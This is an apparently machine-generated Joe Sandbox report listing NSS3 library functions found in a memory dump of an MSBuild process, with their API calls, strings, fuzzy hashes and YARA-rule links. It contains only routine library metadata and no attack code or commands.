EnterCriticalSection.KERNEL32(?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CB0
PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D97
PR_Lock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4DBA
PR_WaitCondVar.NSS3 ref: 6CAE4DD4
PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4DEF

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: b90a7b950010c28cab4e0c41de9156fba105afa6f728b92304e932d5d8ed8b14
Instruction ID: b3d0c6dc6fdf271d8bfc82a82e6dea86ae94a7e8b0fcc02a223e7be7e7f09985
Opcode Fuzzy Hash: b90a7b950010c28cab4e0c41de9156fba105afa6f728b92304e932d5d8ed8b14
Instruction Fuzzy Hash: 59417BB1A14B55CFCB00AFBDD488569BBB8FF49318F058669D8889B700E730E994CBD1

Function 6CBAECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CBADE64), ref: 6CBAED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBAED22

Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095

PL_FreeArenaPool.NSS3(?), ref: 6CBAED4A
PL_FinishArenaPool.NSS3(?), ref: 6CBAED6B
PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBAED38

Part of subcall function 6CAE4C70: TlsGetValue.KERNEL32(?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4C97
Part of subcall function 6CAE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CB0
Part of subcall function 6CAE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6CBAED52
PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBAED83
PL_FreeArenaPool.NSS3(?), ref: 6CBAED95
PL_FinishArenaPool.NSS3(?), ref: 6CBAED9D

Part of subcall function 6CBC64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CBC127C,00000000,00000000,00000000), ref: 6CBC650E

Strings

security, xrefs: 6CBAED06

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 8273e2b247f1af66595eec4169a686d323862e36f709d57657cecb6b5d095b5e
Instruction ID: 3789ca17a4add32f0c1777f7d9607f3cc88e077a4b7c26a18c959066ffbc1f3c
Opcode Fuzzy Hash: 8273e2b247f1af66595eec4169a686d323862e36f709d57657cecb6b5d095b5e
Instruction Fuzzy Hash: 6A116A76A042E46BE61057A5AC44FBF7278EF4160CF040424E8D173E40FB24A66ED6EB

Function 6CB92CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6CB92CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CB92D07

Part of subcall function 6CC709D0: PR_Now.NSS3 ref: 6CC70A22
Part of subcall function 6CC709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC70A35
Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC70A66
Part of subcall function 6CC709D0: PR_GetCurrentThread.NSS3 ref: 6CC70A70
Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC70A9D
Part of subcall function 6CC709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC70AC8
Part of subcall function 6CC709D0: PR_vsmprintf.NSS3(?,?), ref: 6CC70AE8
Part of subcall function 6CC709D0: EnterCriticalSection.KERNEL32(?), ref: 6CC70B19
Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70B48
Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70C76
Part of subcall function 6CC709D0: PR_LogFlush.NSS3 ref: 6CC70C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB92D22

Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(?), ref: 6CC70B88
Part of subcall function 6CC709D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC70C5D
Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CC70C8D
Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70C9C
Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(?), ref: 6CC70CD1
Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC70CEC
Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70CFB
Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70D16
Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CC70D26
Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70D35
Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CC70D65
Part of subcall function 6CC709D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CC70D70
Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70D90
Part of subcall function 6CC709D0: free.MOZGLUE(00000000), ref: 6CC70D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB92D3B

Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC70BAB
Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70BBA
Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CB92D54

Part of subcall function 6CC709D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC70BCB
Part of subcall function 6CC709D0: EnterCriticalSection.KERNEL32(?), ref: 6CC70BDE
Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(?), ref: 6CC70C16

Strings

slotID = 0x%x, xrefs: 6CB92D02
C_InitToken, xrefs: 6CB92CE7
pPin = 0x%p, xrefs: 6CB92D1D
pLabel = 0x%p, xrefs: 6CB92D4F
ulPinLen = %d, xrefs: 6CB92D36

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: 0dea8b9b59d815d454903ba225370fcbf36823c242388f61a9e81b83e012ea99
Instruction ID: 76621bad107a16e849e8c576bfc47e0850f7f0bf451c9056b86962d56f1eccb7
Opcode Fuzzy Hash: 0dea8b9b59d815d454903ba225370fcbf36823c242388f61a9e81b83e012ea99
Instruction Fuzzy Hash: 3221F575601194AFDB009F54DD9CE8A3BB1EF4331EF458021E508D3632EB318E59CB62

Function 6CC70EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6CB52357), ref: 6CC70EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CB52357), ref: 6CC70EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CC70EE6

Part of subcall function 6CC709D0: PR_Now.NSS3 ref: 6CC70A22
Part of subcall function 6CC709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC70A35
Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC70A66
Part of subcall function 6CC709D0: PR_GetCurrentThread.NSS3 ref: 6CC70A70
Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC70A9D
Part of subcall function 6CC709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC70AC8
Part of subcall function 6CC709D0: PR_vsmprintf.NSS3(?,?), ref: 6CC70AE8
Part of subcall function 6CC709D0: EnterCriticalSection.KERNEL32(?), ref: 6CC70B19
Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70B48
Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70C76
Part of subcall function 6CC709D0: PR_LogFlush.NSS3 ref: 6CC70C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CC70EFA

Part of subcall function 6CB5AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CB5AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC70F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC70F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC70F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC70F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CC70ED9, 6CC70EE5, 6CC70F06, 6CC70F0B
Aborting, xrefs: 6CC70EB3

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: be1b8e35663be69b9eec72dd999c5b5823fade84de5fb59c164ab7d362c8d474
Instruction ID: b5ebec4a1fd1e6128120aa3bc0272b5c0271959a89a64e4f5260dbceb239177a
Opcode Fuzzy Hash: be1b8e35663be69b9eec72dd999c5b5823fade84de5fb59c164ab7d362c8d474
Instruction Fuzzy Hash: 4EF0C2BAA001147BDE013BE0DC4AC9B3E3DDF86764F004024FD0956602EA76E92497B6

Function 6CBD4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6CBD4DCB

Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CBD4DE1

Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CBD4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBD4E59

Part of subcall function 6CBBFAB0: free.MOZGLUE(?,-00000001,?,?,6CB5F673,00000000,00000000), ref: 6CBBFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC9300C,00000000), ref: 6CBD4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6CBD4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CBD4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBD521A

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 310176b160404682658e341348e87bed0481b36a5c5ef4f6de62bb524ed4a84c
Instruction ID: f497741635c64d7a72f698e010ad7c41840c66c7fc1783a905174f00b3064fcb
Opcode Fuzzy Hash: 310176b160404682658e341348e87bed0481b36a5c5ef4f6de62bb524ed4a84c
Instruction Fuzzy Hash: D2F1ACB1E00249CBDB08CF54D8407AEB7B2FF44358F268169E915AB780E735E985CF92

Function 6CBD0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6CBD2C2A), ref: 6CBD0C81

Part of subcall function 6CBBBE30: SECOID_FindOID_Util.NSS3(6CB7311B,00000000,?,6CB7311B,?), ref: 6CBBBE44

Part of subcall function 6CBA8500: SECOID_GetAlgorithmTag_Util.NSS3(6CBA95DC,00000000,00000000,00000000,?,6CBA95DC,00000000,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA8517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBD0CC4

Part of subcall function 6CBBFAB0: free.MOZGLUE(?,-00000001,?,?,6CB5F673,00000000,00000000), ref: 6CBBFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CBD0CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CBD0D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CBD0D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CBD0D7D
free.MOZGLUE(00000000), ref: 6CBD0DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBD0DC1
free.MOZGLUE(00000000), ref: 6CBD0DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBD0E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBD0E0F

Part of subcall function 6CBA95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA95E0
Part of subcall function 6CBA95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA95F5
Part of subcall function 6CBA95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CBA9609
Part of subcall function 6CBA95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CBA961D
Part of subcall function 6CBA95C0: PK11_GetInternalSlot.NSS3 ref: 6CBA970B
Part of subcall function 6CBA95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CBA9756
Part of subcall function 6CBA95C0: PK11_GetIVLength.NSS3(?), ref: 6CBA9767
Part of subcall function 6CBA95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CBA977E
Part of subcall function 6CBA95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBA978E

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: 79511a9c774a8e4d6602d988a106f4b07569cba8ef06524c672d06ea18b4326b
Instruction ID: 7c22cefc2936448635e8412e24bd6129497f5757b7dc0685ae05b73d6adfb4e8
Opcode Fuzzy Hash: 79511a9c774a8e4d6602d988a106f4b07569cba8ef06524c672d06ea18b4326b
Instruction Fuzzy Hash: 134101B5900295ABEB009F64EC81BAF7674EF45308F010029ED1967742EB31BA18CBE2

Function 6CB02E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB02F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6CB02FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6CB03005
memcpy.VCRUNTIME140(?,?,?), ref: 6CB030EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB03131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB03178

Strings

database corruption, xrefs: 6CB0316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB03022, 6CB03156, 6CB03162, 6CB0318A, 6CB03196, 6CB031A2, 6CB031AE, 6CB031BA, 6CB031C6
%s at line %d of [%.10s], xrefs: 6CB03171

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 8f9ca8028b0b55b35c09e835329799db25c30bca98a5e05c07a0fda83577442f
Instruction ID: c22ef658905e22cee8979977896e55cc8800600d8f15ff238085594fd5d4f683
Opcode Fuzzy Hash: 8f9ca8028b0b55b35c09e835329799db25c30bca98a5e05c07a0fda83577442f
Instruction Fuzzy Hash: 1BB19E70E452559FCB18CF9DC888AEEBBB1FF48304F148029E845B7B45E3759942CBA5

Function 6CAE2400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6CAE24EC
sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6CAE2315), ref: 6CAE254F
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6CAE2315), ref: 6CAE256C

Strings

API called with finalized prepared statement, xrefs: 6CAE2543, 6CAE254D
bind on a busy prepared statement: [%s], xrefs: 6CAE24E6
misuse, xrefs: 6CAE2561
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAE24F4, 6CAE2557
%s at line %d of [%.10s], xrefs: 6CAE2566
API called with NULL prepared statement, xrefs: 6CAE253C

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
API String ID: 632333372-2222229625
Opcode ID: 1b0dcb472f37116c7412d2146b2603639e81aa089b18ebc5a4d7c7bbfec493b8
Instruction ID: 32f67fd83d7aed9850cdb4a17cc07af2bc95057ca1f9fd4069ba6d64d87e578a
Opcode Fuzzy Hash: 1b0dcb472f37116c7412d2146b2603639e81aa089b18ebc5a4d7c7bbfec493b8
Instruction Fuzzy Hash: 7E412471B446028BE7108F59EC98BA673B6AF89719F18463CE8054FB40D736E886E7D1

Function 6CB96C40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6CB96C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB96C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB96CA3

Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963

PR_LogPrint.NSS3(?,00000000), ref: 6CB96CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CB96CD5

Strings

(CK_INVALID_HANDLE), xrefs: 6CB96C9C
pMechanism = 0x%p, xrefs: 6CB96CD0
C_DigestInit, xrefs: 6CB96C61
hSession = 0x%x, xrefs: 6CB96C7E, 6CB96C8E

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

